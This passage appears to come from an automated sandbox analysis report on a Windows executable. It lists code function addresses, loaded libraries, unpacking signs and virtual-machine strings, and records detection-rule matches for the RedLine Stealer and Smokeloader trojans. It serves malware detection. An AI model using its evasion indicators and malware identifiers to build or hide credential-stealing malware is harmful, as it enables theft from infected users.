                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043D2F00_2_0043D2F0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043C2800_2_0043C280
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004152980_2_00415298
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004082AE0_2_004082AE
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004252BA0_2_004252BA
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041CB050_2_0041CB05
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00428BC00_2_00428BC0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004143C20_2_004143C2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00402BD00_2_00402BD0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00428BE90_2_00428BE9
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004373990_2_00437399
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004393A00_2_004393A0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00416BA50_2_00416BA5
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004293AA0_2_004293AA
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004223B80_2_004223B8
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00436C000_2_00436C00
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004234100_2_00423410
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042B4FC0_2_0042B4FC
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00404CB00_2_00404CB0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004074B00_2_004074B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041DD500_2_0041DD50
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004185780_2_00418578
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042D57E0_2_0042D57E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004245020_2_00424502
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00421D100_2_00421D10
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0040DD250_2_0040DD25
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041D5E00_2_0041D5E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004175820_2_00417582
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043D5800_2_0043D580
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00427DA20_2_00427DA2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004205B00_2_004205B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042C64A0_2_0042C64A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00426E500_2_00426E50
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042B4F70_2_0042B4F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043462A0_2_0043462A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004356300_2_00435630
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004066E00_2_004066E0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042C6E40_2_0042C6E4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00430EF00_2_00430EF0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004256F90_2_004256F9
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00422E930_2_00422E93
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00425E900_2_00425E90
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004156A00_2_004156A0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041BEA00_2_0041BEA0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00438EA00_2_00438EA0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00435EA00_2_00435EA0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00405EB00_2_00405EB0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041C6BB0_2_0041C6BB
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00415F660_2_00415F66
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004197700_2_00419770
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004097000_2_00409700
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042C7260_2_0042C726
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0042C7350_2_0042C735
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041DF800_2_0041DF80
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00402FA00_2_00402FA0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009EC0E80_2_009EC0E8
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A080090_2_00A08009
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FC1AC0_2_009FC1AC
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FE1E70_2_009FE1E7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E61170_2_009E6117
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A191070_2_00A19107
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A161070_2_00A16107
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A081080_2_00A08108
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A111570_2_00A11157
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A142FF0_2_00A142FF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1B2CF0_2_00A1B2CF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E32070_2_009E3207
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F73B20_2_009F73B2
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0B3930_2_00A0B393
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0F3970_2_00A0F397
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E83C70_2_009E83C7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1D3070_2_00A1D307
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F734A0_2_009F734A
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FB3480_2_009FB348
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FF3470_2_009FF347
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A013470_2_00A01347
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E94970_2_009E9497
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E64B70_2_009E64B7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FD4D70_2_009FD4D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0B4270_2_00A0B427
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F144C0_2_009F144C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A164470_2_00A16447
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E45D70_2_009E45D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FC5280_2_009FC528
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F95410_2_009F9541
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1D5570_2_00A1D557
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A196070_2_00A19607
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A096110_2_00A09611
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F87DF0_2_009F87DF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0D7E50_2_00A0D7E5
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1D7E70_2_00A1D7E7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E77170_2_009E7717
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0B7630_2_00A0B763
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0C8B10_2_00A0C8B1
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A148910_2_00A14891
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A158970_2_00A15897
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A008170_2_00A00817
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0B75E0_2_00A0B75E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FD8470_2_009FD847
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0C98D0_2_00A0C98D
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0C99C0_2_00A0C99C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F99D70_2_009F99D7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E89F70_2_009E89F7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FC9210_2_009FC921
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E69470_2_009E6947
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A0C94B0_2_00A0C94B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E99670_2_009E9967
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A19A970_2_00A19A97
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1DA970_2_00A1DA97
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A15AF70_2_00A15AF7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F7BA70_2_009F7BA7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009EABA70_2_009EABA7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A05BF70_2_00A05BF7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009ECB7E0_2_009ECB7E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A03C9B0_2_00A03C9B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A04CF40_2_00A04CF4
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1BC080_2_00A1BC08
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E3C270_2_009E3C27
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E5C570_2_009E5C57
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FDC470_2_009FDC47
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009EFC640_2_009EFC64
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E2E370_2_009E2E37
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A16E670_2_00A16E67
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009EDF8C0_2_009EDF8C
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FDFB70_2_009FDFB7
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E4F170_2_009E4F17
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009F8F350_2_009F8F35
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A01F770_2_00A01F77
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: String function: 009E81D7 appears 78 times
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: String function: 009F42C7 appears 74 times
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1724
                  Source: 66DJ2wErLz.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 66DJ2wErLz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.2375210203.0000000000AC9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 66DJ2wErLz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@12/3
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00AC9F2E CreateToolhelp32Snapshot,Module32First,0_2_00AC9F2E
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,0_2_004361E0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2248
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\fe34dc66-67b4-49af-8cb3-8188df27a75eJump to behavior
                  Source: 66DJ2wErLz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 66DJ2wErLz.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeFile read: C:\Users\user\Desktop\66DJ2wErLz.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\66DJ2wErLz.exe "C:\Users\user\Desktop\66DJ2wErLz.exe"
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1724
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeUnpacked PE file: 0.2.66DJ2wErLz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeUnpacked PE file: 0.2.66DJ2wErLz.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043F6EE push esp; iretd 0_2_0043F6EF
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h0_2_0043BF01
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1C167 push eax; mov dword ptr [esp], 49484716h0_2_00A1C168
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00A1F555 push esp; iretd 0_2_00A1F556
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009FAF5D push esp; iretd 0_2_009FAF66
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00ACC97D pushad ; ret 0_2_00ACC982
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00ACCC03 push ebp; ret 0_2_00ACCC08
                  Source: 66DJ2wErLz.exeStatic PE information: section name: .text entropy: 7.371051868429859
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exe TID: 5660Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exe TID: 6268Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
